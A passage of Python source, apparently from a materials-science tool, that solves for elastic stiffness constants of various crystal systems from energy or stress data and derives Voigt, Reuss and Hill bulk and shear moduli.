4, 0, 0,-3, 0, 6,-5],\n [ 3,-5,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 3, 0, 0, 0, 0,-5,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 2,-4, 0, 0, 0],\n [ 0, 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 0, 2,-4, 0],\n [ 0, 0, 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 0, 2,-4],\n [-4,-6, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-4, 0, 0, 0, 0,-6, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1,-3, 2, 0, 0, 0],\n [ 0, 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1, 0,-3, 2, 0],\n [ 0, 0, 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1, 0,-3, 2],\n [ 5, 4, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 5, 0, 0, 0, 0, 4, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2,-1,-3, 0, 0, 0],\n [ 0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2, 0,-1,-3, 0],\n [ 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2, 0,-1,-3],\n [-6, 3,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-6, 0, 0, 0, 0, 3,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5,-4, 1, 0, 0, 0],\n [ 0, 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5, 0,-4, 1, 0],\n [ 0, 0, 0, 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 0, 0, 5, 0,-4, 1]])\n \n sigma = np.array(self.__sigma[etacalc])\n \n ci = np.linalg.lstsq(Matrix,sigma)\n \n #-- Cubic structures ------------------------------------------------------------------------------\n if (LC == 'CI' or \\\n LC == 'CII'):\n \n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[3,3]=ci[0][2]\n C[1,1]=C[0,0]\n C[2,2]=C[0,0]\n C[0,2]=C[0,1]\n C[1,2]=C[0,1]\n C[4,4]=C[3,3]\n C[5,5]=C[3,3]\n \n #-- Hexagonal Structures --------------------------------------------------------------------------\n if (LC == 'HI' or \\\n LC == 'HII'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[2,2]=ci[0][3]\n C[3,3]=ci[0][4]\n C[1,1]=C[0,0]\n C[1,2]=C[0,2]\n C[4,4]=C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Rhombohedral I Structures ---------------------------------------------------------------------\n if (LC == 'RI'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,3]= ci[0][3]\n C[2,2]= ci[0][4]\n C[3,3]= ci[0][5]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,3]=-C[0,3]\n C[4,5]= C[0,3]\n C[4,4]= C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Rhombohedral II Structures --------------------------------------------------------------------\n if (LC == 'RII'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,3]= ci[0][3]\n C[0,4]= ci[0][4]\n C[2,2]= ci[0][5]\n C[3,3]= ci[0][6]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,3]=-C[0,3]\n C[4,5]= C[0,3]\n C[1,4]=-C[0,4]\n C[3,5]=-C[0,4]\n C[4,4]= C[3,3]\n C[5,5]=0.5*(C[0,0]-C[0,1])\n \n #-- Tetragonal I Structures -----------------------------------------------------------------------\n if (LC == 'TI'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[2,2]= ci[0][3]\n C[3,3]= ci[0][4]\n C[5,5]= ci[0][5]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[4,4]= C[3,3]\n \n #-- Tetragonal II Structures ----------------------------------------------------------------------\n if (LC == 'TII'):\n C[0,0]= ci[0][0]\n C[0,1]= ci[0][1]\n C[0,2]= ci[0][2]\n C[0,5]= ci[0][3]\n C[2,2]= ci[0][4]\n C[3,3]= ci[0][5]\n C[5,5]= ci[0][6]\n C[1,1]= C[0,0]\n C[1,2]= C[0,2]\n C[1,5]=-C[0,5]\n C[4,4]= C[3,3]\n \n #-- Orthorhombic Structures -----------------------------------------------------------------------\n if (LC == 'O'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[1,1]=ci[0][3]\n C[1,2]=ci[0][4]\n C[2,2]=ci[0][5]\n C[3,3]=ci[0][6]\n C[4,4]=ci[0][7]\n C[5,5]=ci[0][8]\n \n #-- Monoclinic Structures -------------------------------------------------------------------------\n if (LC == 'M'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[0,5]=ci[0][3]\n C[1,1]=ci[0][4]\n C[1,2]=ci[0][5]\n C[1,5]=ci[0][6]\n C[2,2]=ci[0][7]\n C[2,5]=ci[0][8]\n C[3,3]=ci[0][9]\n C[3,4]=ci[0][10]\n C[4,4]=ci[0][11]\n C[5,5]=ci[0][12]\n \n #-- Triclinic Structures --------------------------------------------------------------------------\n if (LC == 'N'):\n C[0,0]=ci[0][0]\n C[0,1]=ci[0][1]\n C[0,2]=ci[0][2]\n C[0,3]=ci[0][3]\n C[0,4]=ci[0][4]\n C[0,5]=ci[0][5]\n C[1,1]=ci[0][6]\n C[1,2]=ci[0][7]\n C[1,3]=ci[0][8]\n C[1,4]=ci[0][9]\n C[1,5]=ci[0][10]\n C[2,2]=ci[0][11]\n C[2,3]=ci[0][12]\n C[2,4]=ci[0][13]\n C[2,5]=ci[0][14]\n C[3,3]=ci[0][15]\n C[3,4]=ci[0][16]\n C[3,5]=ci[0][17]\n C[4,4]=ci[0][18]\n C[4,5]=ci[0][19]\n C[5,5]=ci[0][20]\n #--------------------------------------------------------------------------------------------------\n \n \n \n for i in range(5):\n for j in range(i+1,6):\n C[j,i] = C[i,j] \n #%%%--- Calculating the elastic moduli ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if self.__cod in ['espresso']: C = -C/10.\n elif self.__cod in ['vasp','exciting','wien']: C = C*self.__vToGPa/self.__V0#C = C/4.#C=C*self.__CONV/self.__V0\n elif self.__cod in ['emto']: C = C*self.__ToGPa/self.__V0\n self.BV = (C[0,0]+C[1,1]+C[2,2]+2*(C[0,1]+C[0,2]+C[1,2]))/9\n self.GV = ((C[0,0]+C[1,1]+C[2,2])-(C[0,1]+C[0,2]+C[1,2])+3*(C[3,3]+C[4,4]+C[5,5]))/15\n self.EV = (9*self.BV*self.GV)/(3*self.BV+self.GV)\n self.nuV= (1.5*self.BV-self.GV)/(3*self.BV+self.GV)\n self.S = np.linalg.inv(C)\n self.BR = 1/(self.S[0,0]+self.S[1,1]+self.S[2,2]+2*(self.S[0,1]+self.S[0,2]+self.S[1,2]))\n self.GR =15/(4*(self.S[0,0]+self.S[1,1]+self.S[2,2])-4*(self.S[0,1]+self.S[0,2]+self.S[1,2])+3*(self.S[3,3]+self.S[4,4]+self.S[5,5]))\n self.ER = (9*self.BR*self.GR)/(3*self.BR+self.GR)\n self.nuR= (1.5*self.BR-self.GR)/(3*self.BR+self.GR)\n self.BH = 0.50*(self.BV+self.BR)\n self.GH = 0.50*(self.GV+self.GR)\n self.EH = (9.*self.BH*self.GH)/(3.*self.BH+self.GH)\n self.nuH= (1.5*self.BH-self.GH)/(3.*self.BH+self.GH)\n self.AVR= 100.*(self.GV-self.GR)/(self.GV+self.GR)\n #--------------------------------------------------------------------------------------------------------------------------------\n self.__C = C\n \n else:\n Cs = []\n for t in map(str,self.__T):#for t in range(len(self.__T)):\n C = np.zeros((6,6))\n \n LC = self.__structures.items()[0][1].LC\n if self.__mthd == 'Energy':\n if type(etacalc)==list:\n A2=[]\n for i in range(len(etacalc)):\n A2.append(self.__A2[t][i][etacalc[i]])\n else:\n if not etacalc in self.__A2[t][0].keys(): raise ValueError('Please coose one of %s'%(self.__A2[t][0].keys()))\n A2 = [a2[etacalc] for a2 in self.__A2[t]]\n \n #%%%--- Cubic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'CI' or \\\n LC == 'CII'):\n C[0,0] =-2.*(A2[0]-3.*A2[1])/3.\n C[1,1] = C[0,0]\n C[2,2] = C[0,0]\n C[3,3] = A2[2]/6.\n C[4,4] = C[3,3]\n C[5,5] = C[3,3]\n C[0,1] = (2.*A2[0]-3.*A2[1])/3.\n C[0,2] = C[0,1]\n C[1,2] = C[0,1]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Hexagonal structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'HI' or \\\n LC == 'HII'):\n C[0,0] = 2.*A2[3]\n C[0,1] = 2./3.*A2[0] + 4./3.*A2[1] - 2.*A2[2] - 2.*A2[3]\n C[0,2] = 1./6.*A2[0] - 2./3.*A2[1] + 0.5*A2[2]\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[2,2] = 2.*A2[2]\n C[3,3] =-0.5*A2[2] + 0.5*A2[4]\n C[4,4] = C[3,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Rhombohedral I structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'RI'):\n C[0,0] = 2.*A2[3]\n C[0,1] = A2[1]- 2.*A2[3]\n C[0,2] = .5*( A2[0] - A2[1] - A2[2])\n C[0,3] = .5*(-A2[3] - A2[4] + A2[5])\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[1,3] =-C[0,3]\n C[2,2] = 2.*A2[2]\n C[3,3] = .5*A2[4]\n C[4,4] = C[3,3]\n C[4,5] = C[0,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Rhombohedral II structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'RII'):\n C[0,0] = 2.*A2[3]\n C[0,1] = A2[1]- 2.*A2[3]\n C[0,2] = .5*( A2[0] - A2[1] - A2[2])\n C[0,3] = .5*(-A2[3] - A2[4] + A2[5])\n C[0,4] = .5*(-A2[3] - A2[4] + A2[6])\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[1,3] =-C[0,3]\n C[1,4] =-C[0,4] \n C[2,2] = 2.*A2[2]\n C[3,3] = .5*A2[4]\n C[3,5] =-C[0,4]\n C[4,4] = C[3,3]\n C[4,5] = C[0,3]\n C[5,5] = .5*(C[0,0] - C[0,1])\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Tetragonal I structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'TI'):\n C[0,0] = (A2[0]+2.*A2[1])/3.+.5*A2[2]-A2[3]\n C[0,1] = (A2[0]+2.*A2[1])/3.-.5*A2[2]-A2[3]\n C[0,2] = A2[0]/6.-2.*A2[1]/3.+.5*A2[3]\n C[1,1] = C[0,0]\n C[1,2] = C[0,2]\n C[2,2] = 2.*A2[3]\n C[3,3] = .5*A2[4]\n C[4,4] = C[3,3]\n C[5,5] = .5*A2[5]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Tetragonal II structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'TII'):\n C[0,0] = (A2[0]+2.*A2[1])/3.+.5*A2[2]-A2[4]\n C[1,1] = C[0,0]\n C[0,1] = (A2[0]+2.*A2[1])/3.-.5*A2[2]-A2[4]\n C[0,2] = A2[0]/6.-(2./3.)*A2[1]+.5*A2[4]\n C[0,5] = (-A2[2]+A2[3]-A2[6])/4.\n C[1,2] = C[0,2]\n C[1,5] =-C[0,5]\n C[2,2] = 2.*A2[4]\n C[3,3] = .5*A2[5]\n C[4,4] = C[3,3]\n C[5,5] = .5*A2[6]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Orthorhombic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'O'):\n C[0,0] = 2.*A2[0]/3.+4.*A2[1]/3.+A2[3]-2.*A2[4]-2.*A2[5]\n C[0,1] = 1.*A2[0]/3.+2.*A2[1]/3.-.5*A2[3]-A2[5]\n C[0,2] = 1.*A2[0]/3.-2.*A2[1]/3.+4.*A2[2]/3.-.5*A2[3]-A2[4]\n C[1,1] = 2.*A2[4]\n C[1,2] =-2.*A2[1]/3.-4.*A2[2]/3.+.5*A2[3]+A2[4]+A2[5]\n C[2,2] = 2.*A2[5]\n C[3,3] = .5*A2[6]\n C[4,4] = .5*A2[7]\n C[5,5] = .5*A2[8]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Monoclinic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'M'):\n C[0,0] = 2.*A2[0]/3.+8.*(A2[1]+A2[2])/3.-2.*(A2[5]+A2[8]+A2[9])\n C[0,1] = A2[0]/3.+4.*(A2[1]+A2[2])/3.-2.*A2[5]-A2[9]\n C[0,2] =(A2[0]-4.*A2[2])/3.+A2[5]-A2[8]\n C[0,5] =-1.*A2[0]/6.-2.*(A2[1]+A2[2])/3.+.5*(A2[5]+A2[7]+A2[8]+A2[9]-A2[12])\n C[1,1] = 2.*A2[8]\n C[1,2] =-4.*(2.*A2[1]+A2[2])/3.+2.*A2[5]+A2[8]+A2[9]+A2[12]\n C[1,5] =-1.*A2[0]/6.-2.*(A2[1]+A2[2])/3.-.5*A2[3]+A2[5]+.5*(A2[7]+A2[8]+A2[9])\n C[2,2] = 2.*A2[9]\n C[2,5] =-1.*A2[0]/6.+2.*A2[1]/3.-.5*(A2[3]+A2[4]-A2[7]-A2[8]-A2[9]-A2[12])\n C[3,3] = .5*A2[10]\n C[3,4] = .25*(A2[6]-A2[10]-A2[11])\n C[4,4] = .5*A2[11]\n C[5,5] = .5*A2[12]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n #%%%--- Triclinic structures ---%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\n if (LC == 'N'):\n C[0,0] = 2.*A2[0]\n C[0,1] = 1.*(-A2[0]-A2[1]+A2[6])\n C[0,2] = 1.*(-A2[0]-A2[2]+A2[7])\n C[0,3] = .5*(-A2[0]-A2[3]+A2[8]) \n C[0,4] = .5*(-A2[0]+A2[9]-A2[4])\n C[0,5] = .5*(-A2[0]+A2[10]-A2[5])\n C[1,1] = 2.*A2[1]\n C[1,2] = 1.*(A2[11]-A2[1]-A2[2])\n C[1,3] = .5*(A2[12]-A2[1]-A2[3])\n C[1,4] = .5*(A2[13]-A2[1]-A2[4])\n C[1,5] = .5*(A2[14]-A2[1]-A2[5])\n C[2,2] = 2.*A2[2] \n C[2,3] = .5*(A2[15]-A2[2]-A2[3])\n C[2,4] = .5*(A2[16]-A2[2]-A2[4])\n C[2,5] = .5*(A2[17]-A2[2]-A2[5])\n C[3,3] = .5*A2[3]\n C[3,4] = .25*(A2[18]-A2[3]-A2[4])\n C[3,5] = .25*(A2[19]-A2[3]-A2[5])\n C[4,4] = .5*A2[4]\n C[4,5] = .25*(A2[20]-A2[4]-A2[5])\n C[5,5] = .5*A2[5]\n #--------------------------------------------------------------------------------------------------------------------------------\n \n elif self.__mthd == 'Stress':\n \n if (LC == 'CI' or \\\n LC == 'CII'):\n Matrix = np.mat([[1.0, 5.0, 0.0],\n [2.0, 4.0, 0.0],\n [3.0, 3.0, 0.0],\n [0.0, 0.0, 4.0],\n [0.0, 0.0, 5.0],\n [0.0, 0.0, 6.0]])\n \n if (LC == 'HI' or \\\n LC == 'HII'):\n Matrix = np.mat([[ 1, 2, 3, 0, 0],\n [ 2, 1, 3, 0, 0],\n [ 0, 0, 3, 3, 0],\n [ 0, 0, 0, 0, 4],\n [ 0, 0, 0, 0, 5],\n [ 3,-3, 0, 0, 0],\n [ 3,-5,-1, 0, 0],\n [-5, 3,-1, 0, 0],\n [ 0, 0,-2,-1, 0],\n [ 0, 0, 0, 0, 6],\n [ 0, 0, 0, 0, 2],\n [-2, 2, 0, 0, 0]])\n \n if (LC == 'RI'):\n Matrix = np.mat([[ 1, 2, 3, 4, 0, 0],\n [ 2, 1, 3,-4, 0, 0],\n [ 0, 0, 3, 0, 3, 0],\n [ 0, 0, 0,-1, 0, 4],\n [ 0, 0, 0, 6, 0, 5],\n [ 3,-3, 0, 5, 0, 0],\n [ 3,-5,-1, 6, 0, 0],\n [-5, 3,-1,-6, 0, 0],\n [ 0, 0,-2, 0,-1, 0],\n [ 0, 0, 0, 8, 0, 6],\n [ 0, 0, 0,-4, 0, 2],\n [-2, 2, 0, 2, 0, 0]])\n \n if (LC == 'RII'):\n Matrix = np.mat([[ 1, 2, 3, 4, 5, 0, 0],\n [ 2, 1, 3,-4,-5, 0, 0],\n [ 0, 0, 3, 0, 0, 3, 0],\n [ 0, 0, 0,-1,-6, 0, 4],\n [ 0, 0, 0, 6,-1, 0, 5],\n [ 3,-3, 0, 5,-4, 0, 0],\n [ 3,-5,-1, 6, 2, 0, 0],\n [-5, 3,-1,-6,-2, 0, 0],\n [ 0, 0,-2, 0, 0,-1, 0],\n [ 0, 0, 0, 8, 4, 0, 6],\n [ 0, 0, 0,-4, 8, 0, 2],\n [-2, 2, 0, 2,-6, 0, 0]])\n \n if (LC == 'TI'):\n Matrix = np.mat([[ 1, 2, 3, 0, 0, 0],\n [ 2, 1, 3, 0, 0, 0],\n [ 0, 0, 3, 3, 0, 0],\n [ 0, 0, 0, 0, 4, 0],\n [ 0, 0, 0, 0, 5, 0],\n [ 0, 0, 0, 0, 0, 6],\n [ 3,-5,-1, 0, 0, 0],\n [-5, 3,-1, 0, 0, 0],\n [ 0, 0,-2,-1, 0, 0],\n [ 0, 0, 0, 0, 6, 0],\n [ 0, 0, 0, 0, 2, 0],\n [ 0, 0, 0, 0, 0,-4]])\n \n if (LC == 'TII'):\n Matrix = np.mat([[ 1, 2, 3, 6, 0, 0, 0],\n [ 2, 1, 3,-6, 0, 0, 0],\n [ 0, 0, 3, 0, 3, 0, 0],\n [ 0, 0, 0, 0, 0, 4, 0],\n [ 0, 0, 0, 0, 0, 5, 0],\n [ 0, 0, 0,-1, 0, 0, 6],\n [ 3,-5,-1,-4, 0, 0, 0],\n [-5, 3,-1, 4, 0, 0, 0],\n [ 0, 0,-2, 0,-1, 0, 0],\n [ 0, 0, 0, 0, 0, 6, 0],\n [ 0, 0, 0, 0, 0, 2, 0],\n [ 0, 0, 0, 8, 0, 0,-4]])\n \n if (LC == 'O'):\n Matrix = np.mat([[1, 2, 3, 0, 0, 0, 0, 0, 0],\n [0, 1, 0, 2, 3, 0, 0, 0, 0],\n [0, 0, 1, 0, 2, 3, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 4, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 5, 0],\n [0, 0, 0, 0, 0, 0, 0, 0, 6],\n [3,-5,-1, 0, 0, 0, 0, 0, 0],\n [0, 3, 0,-5,-1, 0, 0, 0, 0],\n [0, 0, 3, 0,-5,-1, 0, 0, 0],\n [0, 0, 0, 0, 0, 0, 6, 0, 0],\n [0, 0, 0, 0, 0, 0, 0, 2, 0],\n [0, 0, 0, 0, 0, 0, 0, 0,-4],\n [5, 4, 6, 0, 0, 0, 0, 0, 0],\n [0, 5, 0, 4, 6, 0, 0, 0, 0],\n [0, 0, 5, 0, 4, 6, 0, 0, 0],\n [0, 0, 0, 0, 0, 0,-2, 0, 0],\n [0, 0, 0, 0, 0, 0, 0,-1, 0],\n [0, 0, 0, 0, 0, 0, 0, 0,-3]])\n \n if (LC == 'M'):\n Matrix = np.mat([[ 1, 2, 3, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 1, 0, 0, 2, 3, 6, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 1, 0, 0, 2, 0, 3, 6, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 5, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 5, 0],\n [ 0, 0, 0, 1, 0, 0, 2, 0, 3, 0, 0, 0, 6],\n [-2, 1, 4,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-2, 0, 0, 1, 4,-5, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-2, 0, 0, 1, 0, 4,-5, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 6, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-3, 6, 0],\n [ 0, 0, 0,-2, 0, 0, 1, 0, 4, 0, 0,-5, 0],\n [ 3,-5,-1,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 3, 0, 0,-5,-1,-4, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 3, 0, 0,-5, 0,-1,-4, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 2, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 6, 2, 0],\n [ 0, 0, 0, 3, 0, 0,-5, 0,-1, 0, 0,-4, 0],\n [-4,-6, 5, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-4, 0, 0,-6, 5, 2, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-4, 0, 0,-6, 0, 5, 2, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,-3, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1,-3, 0],\n [ 0, 0, 0,-4, 0, 0,-6, 0, 5, 0, 0, 2, 0],\n [ 5, 4, 6,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 5, 0, 0, 4, 6,-3, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 5, 0, 0, 4, 0, 6,-3, 0, 0, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0, 0],\n [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,-2,-1, 0],\n [ 0, 0, 0, 5, 0, 0, 4, 0, 6, 0, 0,-3, 0]])\n \n if (LC == 'N'):\n Matrix = np.mat([[ 1, 2, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 1, 0, 0, 0, 0, 2, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 4, 5, 6, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 5, 6, 0, 0, 0],\n [ 0, 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 0, 5, 6, 0],\n [ 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 2, 0, 0, 0, 3, 0, 0, 4, 0, 5, 6],\n [-2, 1, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-2, 0, 0, 0, 0, 1, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4,-3, 6,-5, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 6,-5, 0, 0, 0],\n [ 0, 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 0, 6,-5, 0],\n [ 0, 0, 0, 0, 0,-2, 0, 0, 0, 0, 1, 0, 0, 0, 4, 0, 0,-3, 0, 6,-5],\n [ 3,-5,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 3, 0, 0, 0, 0,-5,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 6, 2,-4, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 2,-4, 0, 0, 0],\n [ 0, 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 0, 2,-4, 0],\n [ 0, 0, 0, 0, 0, 3, 0, 0, 0, 0,-5, 0, 0, 0,-1, 0, 0, 6, 0, 2,-4],\n [-4,-6, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-4, 0, 0, 0, 0,-6, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 1,-3, 2, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1,-3, 2, 0, 0, 0],\n [ 0, 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1, 0,-3, 2, 0],\n [ 0, 0, 0, 0, 0,-4, 0, 0, 0, 0,-6, 0, 0, 0, 5, 0, 0, 1, 0,-3, 2],\n [ 5, 4, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 5, 0, 0, 0, 0, 4, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6,-2,-1,-3, 0, 0, 0, 0, 0, 0],\n [ 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2,-1,-3, 0, 0, 0],\n [ 0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2, 0,-1,-3, 0],\n [ 0, 0, 0, 0, 0, 5, 0, 0, 0, 0, 4, 0, 0, 0, 6, 0, 0,-2, 0,-1,-3],\n [-6, 3,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0,-6, 0, 0, 0, 0, 3,-2, 5,-4, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [ 0, 0,-6, 0, 0, 0, 0, 3, 0, 0, 0,-2, 5,-4, 1, 0, 0, 0, 0, 0, 